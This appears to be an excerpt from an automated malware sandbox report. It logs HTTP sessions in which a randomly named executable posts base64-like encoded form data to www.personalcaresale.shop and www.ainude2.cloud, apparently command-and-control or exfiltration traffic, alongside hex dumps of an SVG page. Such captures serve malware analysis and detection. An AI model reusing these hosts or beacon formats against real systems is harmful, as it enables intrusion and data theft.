                                                                                                        Data Ascii: x1="484.215" y1="411.146" x2="476.378" y2="411.146" /> </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-mite
                                                                                                        Oct 10, 2024 14:47:24.928133011 CEST448INData Raw: 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78
                                                                                                        Data Ascii: troke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
                                                                                                        Oct 10, 2024 14:47:24.928406954 CEST1236INData Raw: 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 32 35 33 2e 32 39 22 20 63 79 3d 22 32 32 39 2e 32 34 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c
                                                                                                        Data Ascii: e fill="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E
                                                                                                        Oct 10, 2024 14:47:24.928477049 CEST1236INData Raw: 33 2d 31 39 2e 32 32 31 6c 35 32 2e 33 34 39 2c 31 34 2e 30 33 35 63 31 34 2e 35 30 34 2c 33 2e 38 38 39 2c 32 33 2e 31 31 2c 31 38 2e 37 39 39 2c 31 39 2e 32 32 31 2c 33 33 2e 33 30 33 6c 2d 31 35 2e 36 39 34 2c 35 38 2e 35 33 37 0a 09 09 09 43
                                                                                                        Data Ascii: 3-19.221l52.349,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke
                                                                                                        Oct 10, 2024 14:47:24.932941914 CEST1236INData Raw: 2e 38 32 39 2c 31 37 2e 33 33 2d 35 2e 37 36 37 2c 32 31 2e 37 34 31 63 2d 37 2e 35 39 36 2c 34 2e 34 31 31 2d 31 37 2e 33 33 2c 31 2e 38 32 39 2d 32 31 2e 37 34 31 2d 35 2e 37 36 37 63 2d 31 2e 37 35 34 2d 33 2e 30 32 31 2d 32 2e 38 31 37 2d 35
                                                                                                        Data Ascii: .829,17.33-5.767,21.741c-7.596,4.411-17.33,1.829-21.741-5.767c-1.754-3.021-2.817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" s


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        21192.168.2.450025104.21.21.230805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:47:30.074976921 CEST775OUTPOST /7ug6/ HTTP/1.1
                                                                                                        Host: www.personalcaresale.shop
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.personalcaresale.shop
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 199
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.personalcaresale.shop/7ug6/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 46 56 68 6b 42 76 74 4c 73 64 2b 63 33 59 70 4a 65 37 78 59 77 50 62 65 42 7a 64 37 57 39 72 48 53 53 65 34 6c 4a 5a 71 35 4b 4f 4c 39 55 69 75 33 59 65 39 42 6b 74 52 35 66 4b 67 43 2b 64 55 33 65 45 56 4e 52 46 58 67 4b 56 35 67 37 6a 37 61 4f 46 77 48 52 41 79 64 51 37 6a 30 67 42 54 64 5a 56 78 63 68 70 36 30 70 2b 5a 55 67 34 4b 2f 67 6d 4c 42 68 52 44 35 63 64 46 49 4b 78 4d 79 77 6e 39 67 72 61 42 64 67 65 31 38 5a 4c 78 59 44 61 57 45 67 47 78 36 66 67 34 4a 46 36 67 76 78 66 64 59 56 70 75 31 74 75 73 54 58 51 57 6e 74 48 70 72 44 51 5a 72 73 57 43 35 55 48 4b 31 51 3d 3d
                                                                                                        Data Ascii: Sh=FVhkBvtLsd+c3YpJe7xYwPbeBzd7W9rHSSe4lJZq5KOL9Uiu3Ye9BktR5fKgC+dU3eEVNRFXgKV5g7j7aOFwHRAydQ7j0gBTdZVxchp60p+ZUg4K/gmLBhRD5cdFIKxMywn9graBdge18ZLxYDaWEgGx6fg4JF6gvxfdYVpu1tusTXQWntHprDQZrsWC5UHK1Q==
                                                                                                        Oct 10, 2024 14:47:30.760703087 CEST702INHTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:47:30 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SrkouYgbFSvjyNm4ghpwvDtClIQMVGiqnIP4Ibf3zogZf0fJFZ6Ld8ghu4yZ4HZMDw7An2%2BeK7Lal2ZIyGQCHGbj%2BFN2QZZTeYrZTgE4SYTlc8MLLHkxc4dDV6wYHd%2FnIoQgJn%2B7fvYmdjhe"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8d06b827aa7242c0-EWR
                                                                                                        Content-Encoding: gzip
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 190


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        22192.168.2.450026104.21.21.230805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:47:32.619025946 CEST795OUTPOST /7ug6/ HTTP/1.1
                                                                                                        Host: www.personalcaresale.shop
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.personalcaresale.shop
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 219
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.personalcaresale.shop/7ug6/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 46 56 68 6b 42 76 74 4c 73 64 2b 63 30 34 35 4a 5a 61 78 59 6e 2f 62 64 4e 54 64 37 41 4e 72 4c 53 53 43 34 6c 49 4d 31 35 59 61 4c 38 30 53 75 30 5a 65 39 41 6b 74 52 79 2f 4b 35 47 2b 64 54 33 65 4a 32 4e 56 42 58 67 4b 42 35 67 2b 66 37 61 2f 46 7a 47 42 41 30 55 77 37 74 71 51 42 54 64 5a 56 78 63 68 38 79 30 70 6d 5a 55 7a 67 4b 2f 45 79 49 43 68 52 41 2b 63 64 46 4d 4b 77 46 79 77 6d 61 67 71 47 37 64 6a 6d 31 38 63 33 78 59 77 43 56 4c 67 47 33 30 2f 67 6e 46 55 6e 77 6a 51 58 63 47 48 31 58 6f 2f 65 64 53 52 42 4d 32 63 6d 2b 35 44 30 71 32 72 66 32 30 58 36 44 75 58 32 41 41 4d 4a 54 33 6d 47 6a 42 47 6a 69 72 5a 62 4c 57 54 73 3d
                                                                                                        Data Ascii: Sh=FVhkBvtLsd+c045JZaxYn/bdNTd7ANrLSSC4lIM15YaL80Su0Ze9AktRy/K5G+dT3eJ2NVBXgKB5g+f7a/FzGBA0Uw7tqQBTdZVxch8y0pmZUzgK/EyIChRA+cdFMKwFywmagqG7djm18c3xYwCVLgG30/gnFUnwjQXcGH1Xo/edSRBM2cm+5D0q2rf20X6DuX2AAMJT3mGjBGjirZbLWTs=
                                                                                                        Oct 10, 2024 14:47:33.338337898 CEST700INHTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:47:33 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tzRCHBFuAmixsbqmUDwArSs9qCY9i27FUN5LkJCPXcbvdLi6uMcMxY465hNXOHzZ3IE33BZ0IGk%2Bo2DutnibkEMi9AH7CBnlMGEzjIycRy%2ByGlg3Idlxk81jluvlAmfGpLrhf%2FiIhZBLYlXm"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8d06b8376dc98c87-EWR
                                                                                                        Content-Encoding: gzip
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 190


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        23192.168.2.450027104.21.21.230805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:47:35.157192945 CEST10877OUTPOST /7ug6/ HTTP/1.1
                                                                                                        Host: www.personalcaresale.shop
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.personalcaresale.shop
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 10299
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.personalcaresale.shop/7ug6/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 46 56 68 6b 42 76 74 4c 73 64 2b 63 30 34 35 4a 5a 61 78 59 6e 2f 62 64 4e 54 64 37 41 4e 72 4c 53 53 43 34 6c 49 4d 31 35 59 69 4c 38 48 61 75 30 2b 4b 39 53 55 74 52 2f 66 4b 38 47 2b 63 50 33 65 41 2f 4e 56 4d 67 67 49 35 35 67 59 4c 37 4c 64 74 7a 50 42 41 30 57 77 37 73 30 67 41 48 64 5a 46 4c 63 68 73 79 30 70 6d 5a 55 31 6b 4b 32 77 6d 49 4f 42 52 44 35 63 64 2f 49 4b 77 74 79 77 2b 67 67 71 79 72 64 53 47 31 39 38 48 78 4c 79 61 56 55 51 47 31 7a 2f 68 79 46 55 71 71 6a 55 2b 6c 47 47 42 78 6f 38 43 64 57 46 45 39 6c 49 36 41 37 46 73 6c 6d 61 6a 67 37 46 32 34 6e 77 43 38 4c 50 6f 50 6f 30 32 67 43 78 62 74 34 59 62 38 43 6c 64 66 74 34 32 79 67 7a 38 47 34 76 4b 34 4c 76 32 38 39 4f 47 70 68 58 35 74 59 65 48 54 6b 67 57 38 41 56 4e 65 31 44 2f 44 55 49 75 4a 4d 61 71 79 36 67 4d 6d 59 66 6c 30 56 37 47 38 30 43 35 48 50 45 73 46 68 35 43 4e 51 68 73 50 56 61 31 59 7a 2f 48 39 44 42 58 38 4f 4b 39 6c 61 48 75 48 39 5a 63 4a 69 78 57 31 69 70 76 6d 43 42 6d 2f 4e 2f 49 56 36 4a 6d [TRUNCATED]
                                                                                                        Data Ascii: Sh=FVhkBvtLsd+c045JZaxYn/bdNTd7ANrLSSC4lIM15YiL8Hau0+K9SUtR/fK8G+cP3eA/NVMggI55gYL7LdtzPBA0Ww7s0gAHdZFLchsy0pmZU1kK2wmIOBRD5cd/IKwtyw+ggqyrdSG198HxLyaVUQG1z/hyFUqqjU+lGGBxo8CdWFE9lI6A7Fslmajg7F24nwC8LPoPo02gCxbt4Yb8Cldft42ygz8G4vK4Lv289OGphX5tYeHTkgW8AVNe1D/DUIuJMaqy6gMmYfl0V7G80C5HPEsFh5CNQhsPVa1Yz/H9DBX8OK9laHuH9ZcJixW1ipvmCBm/N/IV6JmU+EYooCNZr2Z6AKSqK6AXVaRmWAJDqTc1TXpGq05Y+I6wBImzQfWRCEB/WlU7jLQET0CfZbHqtxoM/TiI4BpX2BuTEib/uUfPnYPn/CmIu+4swFC4JGlrPLLIMizAJS4LHkmMhcDtg57sSEVupH99q4jKOccBAyLOJjXWGju4nIo6xrAxVFTfkRuvrf/rkF8XCinJ0KKHLl5YPTgY1s4An+213L8ZF2DYAlFkin9pjmGZzajWc+pLJsOzpbxhJIRBG+T2zIJLTnGqLHkHv0VqNegt8Jo85L7lf5BD2A7DtaLcKyMEZrWPPcojaoXF+lOIKgiEbcg3lU35ycC/awLLMvQiev8IF09RkPAbaRBsEiaJCKuD/Z4cHfYpuWigmCSoCd5nsBB9fmC7vxzVQFPHAm6z+9WRnyyo1eS9nvkGW913LTlsMWcCtP+pI1LxG59f+f8orUn0EowGFDAN6ECjjCNToHSQoTmYYY7v2LRs1CXxppmXgrXB8/MZ0wKZiCRF7CnqRUMFSmNgINoc45nVF2dnPWvw7zeWeAcHGtvzbIvVgDaWY9vkVBYTzXPBdSY4bi7bEP15Clv+0jhxS8/72SzVWtYlpqJ15teu4LCMBXbQGyTmoM0CCP604QAI5ThUIOUeBbypFpfSbul/6ubNEn3Q4qdFETws8 [TRUNCATED]
                                                                                                        Oct 10, 2024 14:47:36.342930079 CEST704INHTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:47:35 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7qZmIIrcoC1kQovUaKDpvVpJ80SSS%2BCaKD%2FPzBTnCYwOzSTKNBPcSRoH0rxxllNFJiWNu6aAhg6hUW8QvzY1Rz5lEE1NfCqYSgd0FEmRaAXwK3Ag%2B%2BrJIe%2BdAM3A8XN4xkvNcQmArX4iXbOw"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8d06b8478dce443e-EWR
                                                                                                        Content-Encoding: gzip
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 190
                                                                                                        Oct 10, 2024 14:47:36.345379114 CEST704INHTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:47:35 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7qZmIIrcoC1kQovUaKDpvVpJ80SSS%2BCaKD%2FPzBTnCYwOzSTKNBPcSRoH0rxxllNFJiWNu6aAhg6hUW8QvzY1Rz5lEE1NfCqYSgd0FEmRaAXwK3Ag%2B%2BrJIe%2BdAM3A8XN4xkvNcQmArX4iXbOw"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8d06b8478dce443e-EWR
                                                                                                        Content-Encoding: gzip
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 190


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        24192.168.2.450028104.21.21.230805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:47:37.703326941 CEST494OUTGET /7ug6/?f6SpQ=_n84nZ4HGta&Sh=IXJECadondWQh91fX6gMxPrxehpEbK/sXgmpgogo4Iy+9wWP8KKNSUdB/sGHFOlG3Y0hTlB2s4BH9YC5SvgzHxgsSlTs6mELWZRATho00JDOVx4L12qgKBs= HTTP/1.1
                                                                                                        Host: www.personalcaresale.shop
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Oct 10, 2024 14:47:38.379113913 CEST692INHTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:47:38 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I11BaVq1cCi1YXatJQfQr7AG4OXMehuzA5%2FBg2jQUM9QF5ePyWS9KogFmbsKF7Vog4OJSf%2FNnCOVfEFE7e9ei%2BpHfYDWiThrGArL4iJ5rY%2Faul4GD87aYAVvIVZrZY%2FU2Q1zppDWQAzxpDar"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8d06b8573cc37d18-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        25192.168.2.45002984.32.84.32805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:47:43.600039005 CEST751OUTPOST /wzoz/ HTTP/1.1
                                                                                                        Host: www.ainude2.cloud
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.ainude2.cloud
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 199
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.ainude2.cloud/wzoz/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 43 72 30 41 65 5a 33 64 6b 5a 79 34 43 72 4e 61 39 50 69 52 74 72 48 36 56 5a 68 7a 70 58 49 78 72 52 51 2b 6e 61 62 62 66 76 4f 66 41 4e 4f 57 31 49 47 30 35 6b 6d 4e 6b 30 76 41 31 36 57 6b 6a 4a 45 35 77 63 50 64 70 61 72 6f 55 44 2b 30 79 67 31 44 6b 50 53 71 35 73 72 6a 79 77 6e 52 76 57 76 74 68 70 62 5a 54 70 4a 2f 41 51 5a 6c 56 72 32 53 73 36 33 70 67 51 4e 66 38 2f 32 56 55 34 72 58 55 69 32 63 37 75 45 58 4d 62 41 31 5a 7a 75 32 7a 4f 42 6d 35 79 37 53 70 62 35 6e 57 35 47 72 2b 62 56 37 42 51 76 4d 65 6f 4b 30 46 67 56 41 46 72 47 6c 33 6a 51 59 50 48 5a 55 46 51 3d 3d
                                                                                                        Data Ascii: Sh=Cr0AeZ3dkZy4CrNa9PiRtrH6VZhzpXIxrRQ+nabbfvOfANOW1IG05kmNk0vA16WkjJE5wcPdparoUD+0yg1DkPSq5srjywnRvWvthpbZTpJ/AQZlVr2Ss63pgQNf8/2VU4rXUi2c7uEXMbA1Zzu2zOBm5y7Spb5nW5Gr+bV7BQvMeoK0FgVAFrGl3jQYPHZUFQ==


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        26192.168.2.45003084.32.84.32805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:47:46.147264957 CEST771OUTPOST /wzoz/ HTTP/1.1
                                                                                                        Host: www.ainude2.cloud
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.ainude2.cloud
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 219
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.ainude2.cloud/wzoz/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 43 72 30 41 65 5a 33 64 6b 5a 79 34 44 49 46 61 34 75 69 52 72 4c 48 37 57 5a 68 7a 6e 33 4a 5a 72 52 55 2b 6e 62 65 44 66 61 57 66 44 73 2b 57 79 35 47 30 36 6b 6d 4e 32 55 76 46 78 36 57 72 6a 4a 49 78 77 5a 50 64 70 61 58 6f 55 43 4f 30 7a 54 74 41 72 2f 53 73 77 4d 72 6c 32 77 6e 52 76 57 76 74 68 6f 2f 6a 54 6f 68 2f 41 6a 42 6c 48 2b 4b 52 68 61 33 75 71 77 4e 66 74 50 33 63 55 34 71 41 55 6d 2b 32 37 74 77 58 4d 62 77 31 5a 6d 4f 78 70 65 42 6b 39 79 36 77 35 4b 34 67 49 4c 62 37 30 74 42 41 66 41 6e 68 62 75 62 75 55 52 30 58 58 72 69 57 71 6b 5a 73 43 45 6b 64 65 59 61 4a 74 62 50 32 76 52 4b 62 79 36 50 76 47 73 38 73 55 43 59 3d
                                                                                                        Data Ascii: Sh=Cr0AeZ3dkZy4DIFa4uiRrLH7WZhzn3JZrRU+nbeDfaWfDs+Wy5G06kmN2UvFx6WrjJIxwZPdpaXoUCO0zTtAr/SswMrl2wnRvWvtho/jToh/AjBlH+KRha3uqwNftP3cU4qAUm+27twXMbw1ZmOxpeBk9y6w5K4gILb70tBAfAnhbubuUR0XXriWqkZsCEkdeYaJtbP2vRKby6PvGs8sUCY=


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        27192.168.2.45003184.32.84.32805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:47:48.687830925 CEST10853OUTPOST /wzoz/ HTTP/1.1
                                                                                                        Host: www.ainude2.cloud
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.ainude2.cloud
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 10299
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.ainude2.cloud/wzoz/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 43 72 30 41 65 5a 33 64 6b 5a 79 34 44 49 46 61 34 75 69 52 72 4c 48 37 57 5a 68 7a 6e 33 4a 5a 72 52 55 2b 6e 62 65 44 66 5a 32 66 41 65 32 57 78 61 75 30 37 6b 6d 4e 31 55 76 45 78 36 57 4d 6a 4a 51 31 77 5a 4c 4e 70 66 54 6f 57 6b 61 30 6a 79 74 41 38 76 53 73 79 4d 72 6b 79 77 6d 54 76 57 66 70 68 6f 76 6a 54 6f 68 2f 41 6d 4e 6c 45 72 32 52 79 71 33 70 67 51 4d 4e 38 2f 32 35 55 34 7a 31 55 6d 7a 42 38 62 41 58 43 66 63 31 56 31 6d 78 69 65 42 69 78 53 36 57 35 50 67 76 49 4c 58 33 30 74 64 71 66 43 37 68 5a 5a 2b 32 4d 6b 55 36 4a 37 75 51 31 33 35 58 46 30 6f 38 54 5a 4f 65 68 35 7a 5a 35 68 50 70 79 6f 32 31 54 50 67 47 49 79 2b 77 41 36 55 34 79 45 61 63 39 47 71 31 36 38 32 44 5a 74 4c 55 58 48 56 54 50 4b 58 39 62 6e 6d 35 35 71 5a 46 6e 44 6e 37 6a 72 31 78 36 4f 56 48 37 4d 35 41 4f 55 74 6e 42 5a 38 55 71 35 35 39 58 57 5a 46 4b 63 43 4e 39 47 66 56 77 4c 54 31 59 33 66 53 36 59 67 2f 63 65 30 78 6d 6a 35 66 54 55 47 64 74 33 6c 57 66 43 6a 30 4d 78 59 55 2f 5a 33 46 74 79 51 [TRUNCATED]
